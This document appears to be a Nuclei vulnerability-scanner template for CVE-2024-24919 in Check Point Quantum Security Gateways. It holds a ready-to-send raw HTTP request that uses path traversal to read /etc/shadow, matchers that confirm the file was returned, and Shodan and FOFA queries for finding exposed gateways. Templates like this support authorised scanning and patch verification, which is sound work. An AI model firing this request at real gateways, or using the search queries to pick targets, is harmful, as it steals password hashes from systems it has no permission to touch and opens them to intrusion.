id: CVE-2024-24919 info: name: Check Point Quantum Gateway - Information Disclosure author: johnk3r severity: high description: | CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway shodan-query: - html:"Check Point SSL Network" - http.html:"check point ssl network" fofa-query: body="check point ssl network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* tags: cve,cve2024,checkpoint,lfi http: - raw: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip aCSHELL/../../../../../../../etc/shadow matchers-condition: and matchers: - type: regex part: body regex: - "root:.*" - "nobody:.*" condition: and - type: status status: - 200